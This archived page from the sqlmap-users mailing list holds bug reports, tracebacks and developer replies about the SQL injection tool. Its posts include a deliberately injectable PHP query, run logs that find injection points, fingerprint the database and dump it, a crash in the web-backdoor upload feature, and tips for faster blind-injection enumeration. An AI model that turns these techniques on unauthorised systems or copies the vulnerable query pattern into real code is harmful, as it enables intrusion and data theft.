TypeError: not enough arguments for format string |
|
From: Tim J. <ma...@ti...> - 2009-11-17 11:34:29
|
Hello,
my name is Tim Jordans.
First of all i have tested sqlmap and thanks for the tool.
I stumbled upon a problem. In the following php-script sqlmap did not
find any injection:
mysql_query('SELECT * FROM tb_apotheke WHERE AID="'.
mysql_real_escape_string($_REQUEST['zahl1']).'" OR AID='.
$_REQUEST['zahl2'].' OR AID="'.
mysql_real_escape_string($_REQUEST['zahl3']).'"'
);
Although the middle parameter is not escaped sqlmap can´t inject. I was
wondering if the statement is not unsecure or is this not part of the
sqlmap testing routine.
I hope that someone could help me with this problem.
greetings
tim jordans
|
|
From: Bernardo D. A. G. <ber...@gm...> - 2009-11-11 10:03:17
|
Hi Andre, This is fixed in sqlmap version from subversion repository. Give it a try if you want. Cheers, B On Fri, Nov 6, 2009 at 14:18, Andre Stoffel <ast...@it...> wrote: > ... > sqlmap version: 0.7 > > Python version: 2.6.2 > > ... > File "/usr/share/sqlmap/lib/controller/controller.py", line 84, in __selectInjection > > return injData[index] > > UnboundLocalError: local variable 'index' referenced before assignment > ... -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
|
From: Andres R. <and...@gm...> - 2009-11-06 17:41:48
|
Eric, On Fri, Nov 6, 2009 at 2:23 PM, Eric H <eri...@gm...> wrote: > I'm not terribly experienced with Python or I'd implement this myself - it > seems like it would be very simple. > > During brute-force blind SQL injection (while enumerating a single character > at a time), I frequently know what the DB/table/column name is within the > first 3 or 4 characters or have a pretty good idea what the next character > is. > > During that input loop, if the program were simply to accept keyboard input, > tag that character and immediately try that specific character on the next > iteration... It would double or triple the speed I could enumerate table > values WHILE decreasing the load on the server during testing. Relying on > the good old fashioned human pattern matching is a low-tech solution, but > seems to have a high reward for a small amount of work. > > I'll eat my shoe if this feature is already implemented and I just missed > it. This is already implemented in the sqlmap modification that I did for w3af. If you want you can take it from there, Cheers, > Thanks! > > Eric > > ------------------------------------------------------------------------------ > Let Crystal Reports handle the reporting - Free Crystal Reports 2008 30-Day > trial. Simplify your report design, integration and deployment - and focus > on > what you do best, core application coding. Discover what's new with > Crystal Reports now. http://p.sf.net/sfu/bobj-july > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Andrés Riancho Founder, Bonsai - Information Security http://www.bonsai-sec.com/ http://w3af.sf.net/ |
|
From: Eric H <eri...@gm...> - 2009-11-06 17:24:06
|
I'm not terribly experienced with Python or I'd implement this myself - it seems like it would be very simple. During brute-force blind SQL injection (while enumerating a single character at a time), I frequently know what the DB/table/column name is within the first 3 or 4 characters or have a pretty good idea what the next character is. During that input loop, if the program were simply to accept keyboard input, tag that character and immediately try that specific character on the next iteration... It would double or triple the speed I could enumerate table values WHILE decreasing the load on the server during testing. Relying on the good old fashioned human pattern matching is a low-tech solution, but seems to have a high reward for a small amount of work. I'll eat my shoe if this feature is already implemented and I just missed it. Thanks! Eric |
|
From: Andre S. <ast...@it...> - 2009-11-06 14:36:34
|
(root@B004)-(/home/ast-moonshine) $ sqlmap -u
"http://www.xxxxxxxxx.yy/get_int.php?id=1" -v 5
.
.
.
.
[14:59:25] [WARNING] Invalid choice, retry
there were multiple injection points, please select the one to use to go
ahead:
[0] place: Cookie, parameter: fe_typo_user, type: stringsingle (default)
[1] place: GET, parameter: id, type: numeric
[q] Quit
> 0
[14:59:30] [ERROR] unhandled exception in sqlmap/0.7, please copy the
command line and the following text and send by e-mail to
sql...@li.... The developer will fix it as soon as
possible:
sqlmap version: 0.7
Python version: 2.6.2
Operating system: linux2
Traceback (most recent call last):
File "/usr/bin/sqlmap", line 84, in main
start()
File "/usr/share/sqlmap/lib/controller/controller.py", line 231, in start
injDataSelected = __selectInjection(injData)
File "/usr/share/sqlmap/lib/controller/controller.py", line 82, in
__selectInjection
__selectInjection(injData)
File "/usr/share/sqlmap/lib/controller/controller.py", line 82, in
__selectInjection
__selectInjection(injData)
File "/usr/share/sqlmap/lib/controller/controller.py", line 82, in
__selectInjection
__selectInjection(injData)
File "/usr/share/sqlmap/lib/controller/controller.py", line 82, in
__selectInjection
__selectInjection(injData)
File "/usr/share/sqlmap/lib/controller/controller.py", line 82, in
__selectInjection
__selectInjection(injData)
File "/usr/share/sqlmap/lib/controller/controller.py", line 82, in
__selectInjection
__selectInjection(injData)
File "/usr/share/sqlmap/lib/controller/controller.py", line 82, in
__selectInjection
__selectInjection(injData)
File "/usr/share/sqlmap/lib/controller/controller.py", line 82, in
__selectInjection
__selectInjection(injData)
File "/usr/share/sqlmap/lib/controller/controller.py", line 82, in
__selectInjection
__selectInjection(injData)
File "/usr/share/sqlmap/lib/controller/controller.py", line 82, in
__selectInjection
__selectInjection(injData)
File "/usr/share/sqlmap/lib/controller/controller.py", line 82, in
__selectInjection
__selectInjection(injData)
File "/usr/share/sqlmap/lib/controller/controller.py", line 82, in
__selectInjection
__selectInjection(injData)
File "/usr/share/sqlmap/lib/controller/controller.py", line 82, in
__selectInjection
__selectInjection(injData)
File "/usr/share/sqlmap/lib/controller/controller.py", line 82, in
__selectInjection
__selectInjection(injData)
File "/usr/share/sqlmap/lib/controller/controller.py", line 82, in
__selectInjection
__selectInjection(injData)
File "/usr/share/sqlmap/lib/controller/controller.py", line 84, in
__selectInjection
return injData[index]
UnboundLocalError: local variable 'index' referenced before assignment
[*] shutting down at: 14:59:30
(root@B004)-(/home/ast-moonshine) $
signature-ast-itw-kms
|
|
From: Andres R. <and...@gm...> - 2009-11-01 15:36:15
|
Bernardo,
I'm just guessing without really looking at the code, but this
seems to be because of a fixed path "sqlmap-0.7/shell/uploader.php" in
your code, that uses "/" as a directory separator, when in Windows
that is not valid. You should use things like:
uploader = os.path.join(os.getcwd(),'shell','uploader.php')
Hope this helps,
Cheers,
On Sun, Nov 1, 2009 at 12:23 PM, Adi Mutu <adi...@ya...> wrote:
>
> [17:14:37] [ERROR] unhandled exception in sqlmap/0.7, please copy the
> command line and the following text and send by e-mail to sqlmap-
> us...@li.... The developer will fix it as soon as possible:
> sqlmap version: 0.7
> Python version: 2.6
> Operating system: win32
> Traceback (most recent call last):
> File "C:\Documents and
> Settings\Adrian\Desktop\toolz\sqli\sqlmap-0.7\sqlmap.py", line 84, in main
> start()
> File "C:\Documents and
> Settings\Adrian\Desktop\toolz\sqli\sqlmap-0.7\lib\controller\controller.py",
> line 263, in start
> action()
> File "C:\Documents and
> Settings\Adrian\Desktop\toolz\sqli\sqlmap-0.7\lib\controller\action.py",
> line 140, in action
> conf.dbmsHandler.osShell()
> File "C:\Documents and
> Settings\Adrian\Desktop\toolz\sqli\sqlmap-0.7\plugins\generic\takeover.py",
> line 295, in osShell
> backdoorUrl = self.__webBackdoorInit()
> File "C:\Documents and
> Settings\Adrian\Desktop\toolz\sqli\sqlmap-0.7\plugins\generic\takeover.py",
> line 170, in __webBackdoorInit
> uploaderStr = fileToStr("%s/%s" % (paths.SQLMAP_SHELL_PATH,
> uploaderName))
> File "C:\Documents and
> Settings\Adrian\Desktop\toolz\sqli\sqlmap-0.7\lib\core\common.py", line 384,
> in fileToStr
> filePointer = open(fileName, "r")
> IOError: [Errno 2] No such file or directory: 'C:\\Documents and
> Settings\\Adrian\\Desktop\\toolz\\sqli\\sqlmap-0.7/shell/uploader.php'
>
>
> [*] shutting down at: 17:14:37
>
>
>
> ------------------------------------------------------------------------------
> Come build with us! The BlackBerry(R) Developer Conference in SF, CA
> is the only developer event you need to attend this year. Jumpstart your
> developing skills, take BlackBerry mobile applications to market and stay
> ahead of the curve. Join us from November 9 - 12, 2009. Register now!
> http://p.sf.net/sfu/devconference
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
--
Andrés Riancho
Founder, Bonsai - Information Security
http://www.bonsai-sec.com/
http://w3af.sf.net/
|
|
From: Adi M. <adi...@ya...> - 2009-11-01 15:24:09
|
[17:14:37] [ERROR] unhandled exception in sqlmap/0.7, please copy the command line and the following text and send by e-mail to sqlmap-
us...@li.... The developer will fix it as soon as possible:
sqlmap version: 0.7
Python version: 2.6
Operating system: win32
Traceback (most recent call last):
File "C:\Documents and Settings\Adrian\Desktop\toolz\sqli\sqlmap-0.7\sqlmap.py", line 84, in main
start()
File "C:\Documents and Settings\Adrian\Desktop\toolz\sqli\sqlmap-0.7\lib\controller\controller.py", line 263, in start
action()
File "C:\Documents and Settings\Adrian\Desktop\toolz\sqli\sqlmap-0.7\lib\controller\action.py", line 140, in action
conf.dbmsHandler.osShell()
File "C:\Documents and Settings\Adrian\Desktop\toolz\sqli\sqlmap-0.7\plugins\generic\takeover.py", line 295, in osShell
backdoorUrl = self.__webBackdoorInit()
File "C:\Documents and Settings\Adrian\Desktop\toolz\sqli\sqlmap-0.7\plugins\generic\takeover.py", line 170, in __webBackdoorInit
uploaderStr = fileToStr("%s/%s" % (paths.SQLMAP_SHELL_PATH, uploaderName))
File "C:\Documents and Settings\Adrian\Desktop\toolz\sqli\sqlmap-0.7\lib\core\common.py", line 384, in fileToStr
filePointer = open(fileName, "r")
IOError: [Errno 2] No such file or directory: 'C:\\Documents and Settings\\Adrian\\Desktop\\toolz\\sqli\\sqlmap-0.7/shell/uploader.php'
[*] shutting down at: 17:14:37
|
|
From: Bernardo D. A. G. <ber...@gm...> - 2009-11-01 11:53:01
|
Hi Windom, Can you please give it a try to latest sqlmap version from svn repository? In case you get the same traceback, please get back to me. Cheers, Bernardo On Wed, Oct 7, 2009 at 13:52, Windom Earle <win...@ma...> wrote: > While doing cookie parameter injection for "--dump-all" option... > > Error log: > > there were multiple injection points, please select the one to use to go ahead: > [0] place: User-Agent, parameter: User-Agent, type: numeric (default) > [1] place: Cookie, parameter: sessiondata, type: numeric > [q] Quit >> 1 > [17:35:50] [INFO] testing for parenthesis on injectable parameter > [17:36:51] [INFO] the injectable parameter requires 3 parenthesis > [17:36:52] [INFO] testing MySQL > [17:37:12] [WARNING] the back-end DMBS is not MySQL > [17:37:12] [INFO] testing Oracle > [17:37:32] [WARNING] the back-end DMBS is not Oracle > [17:37:32] [INFO] testing PostgreSQL > [17:37:54] [WARNING] the back-end DMBS is not PostgreSQL > [17:37:54] [INFO] testing Microsoft SQL Server > [17:38:17] [INFO] confirming Microsoft SQL Server > [17:38:40] [INFO] the back-end DBMS is Microsoft SQL Server > > web application technology: Apache 2.2.11, PHP 5.2.9 > back-end DBMS: Microsoft SQL Server 2000 > > [17:38:40] [INFO] fetching tables > [17:38:40] [INFO] fetching database names > [17:38:40] [INFO] fetching number of databases > [17:38:40] [INFO] retrieved: [17:38:40] [ERROR] unhandled exception in sqlmap/0. > 7, please copy the command line and the following text and send by e-mail to sql > map...@li.... The developer will fix it as soon as possible: > sqlmap version: 0.7 > Python version: 2.6.1 > Operating system: win32 > Traceback (most recent call last): > File "sqlmap.py", line 84, in main > File "lib\controller\controller.pyc", line 263, in start > File "lib\controller\action.pyc", line 120, in action > File "plugins\generic\enumeration.pyc", line 1081, in dumpAll > File "plugins\dbms\mssqlserver.pyc", line 337, in getTables > File "plugins\generic\enumeration.pyc", line 661, in getDbs > File "lib\request\inject.pyc", line 378, in getValue > File "lib\request\inject.pyc", line 308, in __goInferenceProxy > File "lib\request\inject.pyc", line 99, in __goInferenceFields > File "lib\request\inject.pyc", line 58, in __goInference > File "lib\techniques\blind\inference.pyc", line 232, in bisection > File "lib\techniques\blind\inference.pyc", line 105, in getChar > TypeError: not all arguments converted during string formatting -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
|
From: Bernardo D. A. G. <ber...@gm...> - 2009-11-01 11:49:32
|
Hi Kyle, On Sat, Oct 3, 2009 at 19:42, Kyle Anderson <ky...@xk...> wrote: > So it seems that you cannot do a --dump-all on a mysql 4 server > because information_schema is not available. It's not a lack of sqlmap. By design all versions of MySQL < 5.0 do not have information_schema so, as far as I know, no way to automatically identify tables and columns within a database. > But can't I just do a "show databases;" in a sql shell? I tried but I > can't seem to get the sql-shell to work (probably because it says I'm > not a DBA) The --sql-shell functionality does not work exactly like a direct connection with the MySQL console. Statements like show can not be supported (easily) within a SQL injection scenario. On MySQL < 5.0 it is still possible to enumerate the databases via 'mysql' system database's 'db' table and sqlmap does it for you if you specificy --dbs and it fingerprint an old version of MySQL. If it does not, then there's a bug, please report it. Cheers, -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
48 messages has been excluded from this view by a project administrator.
